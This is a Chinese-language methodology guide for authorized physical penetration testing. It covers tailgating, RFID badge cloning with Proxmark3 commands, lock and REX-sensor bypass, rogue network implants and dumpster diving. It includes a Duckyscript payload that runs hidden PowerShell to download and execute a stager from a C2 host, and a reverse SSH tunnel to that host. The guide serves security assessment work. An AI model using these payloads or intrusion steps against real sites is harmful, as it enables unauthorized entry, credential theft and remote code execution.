执行物理入侵评估
概述
物理入侵评估通过尝试未授权进入设施、服务器机房和受限区域来评估组织的物理安全控制措施。这包括尾随员工、克隆 RFID 门禁卡、绕过锁具、部署流氓网络设备以及测试安保人员程序。物理安全测试是全范围红队演练的关键组成部分,因为它通常提供最直接的网络访问路径。MITRE ATT&CK 将物理访问技术映射至 T1200(硬件添加)和 T1091(通过可移动介质复制)。
前置条件
- 已签署授权书(评估期间随身携带)
- 客户安全团队紧急联系方式(24/7)
- 由高管权威签署的"免责信"
- 物理安全测试工具包
- 随身摄像机或记录设备
- 伪装/掩护身份材料(制服、徽章、夹板)
MITRE ATT&CK 映射
| 技术 ID | 名称 | 战术 |
|---|---|---|
| T1200 | 硬件添加 | 初始访问 |
| T1091 | 通过可移动介质复制 | 初始访问 |
| T1199 | 可信关系 | 初始访问 |
| T1078 | 有效账户 | 初始访问 |
物理安全测试工具包
| 工具 | 用途 | 大概费用 |
|---|---|---|
| Proxmark3 RDV4 | RFID 门禁卡克隆(125kHz/13.56MHz) | $300 |
| Flipper Zero | 多协议 RF 分析 | $170 |
| 开锁工具套装(Sparrows) | 机械锁绕过 | $35 |
| 门底工具(UDT) | 从外部绕过门锁 | $30 |
| 撬锁刀 / 插销滑片 | 弹簧锁舌绕过 | $15 |
| LAN Turtle | 流氓网络植入物 | $60 |
| WiFi Pineapple | 流氓无线接入点 | $100 |
| Rubber Ducky / Bash Bunny | USB 按键注入 | $50-80 |
| 夹板 + 安全帽 + 荧光背心 | 社会工程学道具 | $20 |
| 随身摄像机 | 证据记录 | $50 |
技术一:尾随
尾随是指跟随授权人员通过安全入口,而不出示凭据。
方法:
- 双手占满法:携带箱子/设备,请求他人帮忙开门
- 吸烟区返回法:在吸烟区等待,跟随员工返回室内
- 快递员法:穿着快递制服,携带包裹
- 繁忙入口时机:在换班或午餐高峰期进入
- 门被撑开:观察员工是否会撑开门
需测试的防御措施:
- 旋转闸门 / 安全气闸
- 安保人员质询程序
- 跟随进入检测系统
- 员工安全意识
技术二:门禁卡克隆
# Proxmark3 - 读取低频(125kHz)HID 卡
proxmark3> lf hid read
# 输出:HID Prox TAG ID: 2006xxxxxx - FC: 123 CN: 45678
# 克隆到 T5577 空白卡
proxmark3> lf hid clone --fc 123 --cn 45678
# 读取高频(13.56MHz)MIFARE 卡
proxmark3> hf mf rdbl --blk 0 -k FFFFFFFFFFFF
# 使用自定义天线进行远距离捕获(最远 3 英尺)
proxmark3> lf hid read # 使用扩展天线
# Flipper Zero - 读取和模拟
# RFID > 读取 > 将卡靠近 Flipper > 保存 > 模拟
门禁卡克隆攻击流程:
- 在门禁读卡器附近定位(电梯、门口)
- 在员工经过时无线读取徽章(1-3 秒窗口期)
- 克隆到空白卡
- 使用克隆卡进入安全区域
- 记录可访问的区域
技术三:锁具绕过
| 锁具类型 | 绕过方法 | 难度 |
|---|---|---|
| 弹子锁(标准) | 撬锁、耙锁或碰撞钥匙 | 易-中 |
| 片状锁(文件柜) | 撬锁或摇动 | 易 |
| 管状锁(自动售货机、服务器) | 管状撬锁工具 | 易 |
| 电子锁(键盘) | 肩窥、热成像摄像机 | 中 |
| 磁力锁(mag lock) | 门底工具、REX 传感器绕过 | 中 |
| 智能锁(蓝牙) | 重放攻击、固件漏洞 | 难 |
# 电子键盘 - 使用后进行热成像
# 温度较高的按键 = 最近按过的按键
# 在 30 秒内使用 FLIR 摄像机捕获热特征
# REX(请求退出)传感器绕过
# 插入细线或使用压缩空气罐触发
# 磁力门锁内侧的运动传感器
技术四:流氓设备部署
# LAN Turtle - 插入暴露的以太网端口
# 通过 SSH 反向隧道连回 C2 服务器
# 自动配置为中间人
# 配置 LAN Turtle 进行反向 SSH
# 模块:AutoSSH
# 主机:c2.redteam.com
# 端口:22
# 远程端口:2222
# WiFi Pineapple - 部署在公共区域
# 通过邪恶双胞胎攻击捕获无线凭据
# 通过蜂窝调制解调器泄露数据
# USB Rubber Ducky - 丢在停车场或放在桌上
# 载荷:下载并执行 C2 代理
# Duckyscript:
# DELAY 1000
# GUI r
# DELAY 500
# STRING powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('https://c2.redteam.com/stager.ps1')"
# ENTER
技术五:垃圾搜索
在外部废物容器和回收箱中搜索:
- 含敏感信息的打印文件
- 员工名录和组织架构图
- 网络图和 IP 地址
- 碎纸(评估交叉切碎与条状切碎)
- 废弃硬件(硬盘、USB 驱动器)
评估方法
评估前侦察
- 周边巡查 - 识别所有入口、摄像头、哨岗
- 观察员工规律 - 换班时间、休息时间表
- 识别门禁技术(HID、MIFARE、iCLASS)
- 映射摄像头覆盖范围和盲区
- 记录安保人员巡逻路线和时间
执行阶段
- 外部周边:围栏、大门、停车障碍
- 建筑入口:主入口、侧门、装卸码头
- 内部访问:楼层访问、电梯控制
- 受限区域:服务器机房、行政办公室、数据中心
- 设备部署:网络植入物、流氓无线设备
记录要求
- 每次访问尝试的时间戳和位置
- 成功进入的照片/视频
- 接受克隆凭据的门禁读卡器位置
- 未锁门、被撑开的门、尾随机会
- 公共区域可访问的网络端口
- 废物容器中的数据证据
道德与安全注意事项
- 始终携带授权书 - 遇到质询时随时准备表明身份
- 切勿强行进入 - 如果技术会损坏财产,记录并跳过
- 在冲突解除前如有执法人员介入则立即停止
- 未经授权不得拍摄个人
- 记录,不要利用 - 拍照作为证据,不要窃取实际数据
- 安全第一 - 不要进入危险区域或绕过消防安全措施
参考资料
- ISACA 物理渗透测试白皮书(2023)
- ASIS 物理安全专业人员(PSP)指南
- NIST SP 800-116 Rev. 1:智能卡 PIV 指南
- Deviant Ollam - 物理安全评估方法论
- MITRE ATT&CK T1200: https://attack.mitre.org/techniques/T1200/